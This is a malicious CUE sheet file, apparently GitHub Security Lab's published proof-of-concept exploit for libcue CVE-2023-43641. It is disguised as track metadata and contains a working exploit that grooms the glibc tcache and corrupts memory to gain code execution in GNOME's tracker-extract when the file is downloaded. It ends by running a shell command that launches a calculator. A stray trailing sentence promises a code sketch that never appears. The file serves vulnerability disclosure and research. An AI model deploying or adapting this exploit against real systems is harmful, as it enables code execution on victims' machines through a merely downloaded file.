+TRACK 002 AUDIO +TITLE "Again " +TRACK 003 AUDIO +TITLE "Again " +TRACK 004 AUDIO +TITLE "Again " +TRACK 005 AUDIO +TITLE "Again " +TRACK 006 AUDIO +TITLE "Again " +TRACK 007 AUDIO +TITLE "Again " +TRACK 008 AUDIO +TITLE "Again " +TRACK 009 AUDIO +TITLE "Again " +TRACK 010 AUDIO +TITLE "Again " +TRACK 011 AUDIO +TITLE "Again " +TRACK 012 AUDIO +TITLE "Again " +TRACK 013 AUDIO +TITLE "Again " +TRACK 014 AUDIO +TITLE "Again " +TRACK 015 AUDIO +TITLE "Again " +TRACK 016 AUDIO +TITLE "Again " +TRACK 017 AUDIO +TITLE "Again " +TRACK 018 AUDIO +TITLE "Again " +TRACK 019 AUDIO +TITLE "Again " +TRACK 020 AUDIO +TITLE "Again " +TRACK 021 AUDIO +TITLE "Again " +TRACK 022 AUDIO +TITLE "Again " +TRACK 023 AUDIO +TITLE "Again " +TRACK 024 AUDIO +TITLE "Again " +TRACK 025 AUDIO +TITLE "Again " +TRACK 026 AUDIO +TITLE "Again " +TRACK 027 AUDIO +TITLE "Again " +TRACK 028 AUDIO +TITLE "Again " +TRACK 029 AUDIO +TITLE "Again " +TRACK 030 AUDIO +TITLE "Again " +TRACK 031 AUDIO +TITLE "Again " +TRACK 032 AUDIO +TITLE "Again " + +TRACK 033 AUDIO +TITLE "Heap Feng Shui: empty the tcache" +COMPOSER "Allocate a chunk from tcache index 2 " +ARRANGER "Allocate a chunk from tcache index 4 " +PERFORMER "Allocate a chunk from tcache index 6 + " +SONGWRITER "Allocate a chunk from tcache index 7 + " +GENRE "Allocate a chunk from tcache index 11 + + " +MESSAGE "The goal here is to ensure that all subsequent allocations come +from a large contiguous block of memory. This string allocates a chunk from +tcache index 13. Doing this 14 times guarantees that the tcache is empty. " + +TRACK 034 AUDIO +TITLE "Copyright (c) 2023 GitHub, Inc." +COMPOSER "[GitHub Security Lab](https://securitylab.github.com/)" +ARRANGER " +This version of the poc is tuned for Fedora 38 +" +PERFORMER "[Kevin Backhouse](https://github.com/kevinbackhouse) + " +SONGWRITER " + " +GENRE "[The Malloc Maleficarum](https://seclists.org/bugtraq/2005/Oct/118). +See also: [how2heap](https://github.com/shellphish/how2heap). + " +MESSAGE "Proof-of-concept exploit for libcue CVE-2023-43641 (GHSL-2023-197): out of bounds +array access in track_set_index. The vulnerability is used to get code execution in GNOME's +tracker-extract. Download this file to pop a calc." 
+ +TRACK 035 AUDIO +TITLE "Never Gonna Give You Up " +COMPOSER "Rick Astley " +ARRANGER " " +PERFORMER " +We're no strangers to love +You know the rules and so do I + " +SONGWRITER " +A full commitment's what I'm thinking of +You wouldn't get this from any other guy + " +GENRE " +I just want to tell you how I'm feeling +Gotta make you understand + + " +MESSAGE " +Never gonna give you up, never gonna let you down +Never gonna run around and desert you +Never gonna make you cry, never gonna say goodbye +Never gonna tell a lie and hurt you + " +TRACK 036 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 037 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 038 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 039 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 040 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 041 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 042 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 043 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 044 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 045 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 046 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 047 AUDIO +TITLE "for freeing to tcache index 1" +TITLE "free previous title" +INDEX 4294964412 4294958236 +TRACK 048 AUDIO +TITLE "Allocate previously freed string" +INDEX 4294967268 149 +INDEX 4294964230 4294958248 +TITLE "long string to overwrite low bytes of address ð " +INDEX 4294955158 69 +FILE pwned.mp3 MP3 +GENRE "set low bytes of info->file P " +TITLE "long string to overwrite low bytes of address 0 " +INDEX 4294955166 53 +FILE pwned.mp3 MP3 +PERFORMER "set low bytes of file->g_class Ð " +INDEX 4294955163 0 +TITLE "long string to overwrite low bytes of address " +INDEX 4294955226 85 +FILE pwned.mp3 MP3 +TITLE "long string to overwrite low bytes of address ° " +INDEX 4294955054 69 +FILE pwned.mp3 MP3 +TITLE "long string to overwrite low bytes of address " +INDEX 4294955196 277 +FILE pwned.mp3 MP3 +MESSAGE "set low bytes of tcache->entries[15] `" +MESSAGE "kevwozere" +TITLE "long string to overwrite low bytes of address Ð " +INDEX 4294955186 85 +FILE pwned.mp3 MP3 +TITLE "long string to overwrite low bytes of address à " +INDEX 4294955188 949 +FILE pwned.mp3 MP3 +TITLE "long string to overwrite low bytes of address 0" +INDEX 4294955198 949 +FILE pwned.mp3 MP3 +TITLE "long title to allocate 0x110-sized chunk. 
" +TRACK 049 AUDIO +INDEX 4294967243 0 +INDEX 4294967247 1 +INDEX 4294967254 0 +INDEX 4294967255 0 +TRACK 050 AUDIO +TITLE "Overwrite low bytes of track->file.name `" +INDEX 4294967294 277 +FILE "wen poc?" MP3 +TITLE "Overwrite low bytes of track->file.name à" +INDEX 14 949 +FILE pwned.mp3 MP3 +TITLE "Overwrite low bytes of track->file.name 0" +INDEX 24 949 +FILE pwned.mp3 MP3 +TITLE "Overwrite low bytes of track->file.name ° " +INDEX 4294967272 53 +FILE pwned.mp3 MP3 +INDEX 0 4294967295 +INDEX 1 0 +INDEX 1 1879584 +INDEX 14 0 +TRACK 051 AUDIO +FLAGS +TRACK 052 AUDIO +ISRC looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooog-string-to-allocate-0x110-sized-chunk +TITLE "long title to overwrite low bytes of track->isrc `" +INDEX 4294967294 277 +ISRC short-string +INDEX 0 4294967295 +INDEX 1 0 +INDEX 1 250512 +INDEX 4294967088 0 +INDEX 4294967090 0 +INDEX 4294967271 100 +INDEX 4294967273 0 +INDEX 4294967280 80 +TRACK 053 AUDIO +INDEX 4294963786 4294958281 +TRACK 054 AUDIO +INDEX 4294967279 0 +INDEX 4294963614 4294958241 +TRACK 055 AUDIO +INDEX 4294967282 0 +INDEX 4294963442 3837 +TITLE "Temporary long title for tcache index 6 " +TITLE "short title" +TRACK 056 AUDIO +TITLE "Use long title from tcache index 6 " +INDEX 4294967258 197 +TITLE " /bin/bash" +INDEX 4294963250 3838 +TRACK 057 AUDIO +INDEX 4294967279 25389 +INDEX 4294963078 3839 +TITLE "Temporary long title for tcache index 6 " +TITLE "eta son" +TRACK 058 AUDIO +TITLE "Use long title from tcache index 6 " +INDEX 4294967258 357 +TITLE "This command is going to get called repeatedly in an infinite loop, so send SIGSTOP to avoid a fork-bomb and use flock so only one calculator starts. 
killall -SIGSTOP tracker-extract-3; flock -w 3 ~/Downloads/pwned.lock -c 'gnome-calculator -e 1337' && (sleep 10; rm ~/Downloads/pwned.lock; killall -9 tracker-extract-3)" +INDEX 4294962886 4294958253 +PERFORMER "Temporary long name for tcache index 6 " +PERFORMER "short name" +TRACK 059 AUDIO +INDEX 4294962694 4586 +TITLE "Use chunk from tcache index 6 " +INDEX 4294967258 197 +TITLE "short title" +TRACK 060 AUDIO +INDEX 4294962518 4585 +TITLE " Ð " +TRACK 1337 AUDIO +INDEX 4294967290 0 +TITLE "Use the chunk that is still in tcache index 2" +MESSAGE "pop that calc  " +REM DATE "1992 AD" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
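The whitespace padding elided above, and the carefully sized strings in the lunar.cue PoC that follows, both rely on how glibc buckets small allocations into tcache bins by chunk size. The sketch below is not glibc source; it is a minimal model of that arithmetic, assuming x86-64 glibc defaults (8-byte size field, 16-byte chunk alignment), with helper names of our own invention:

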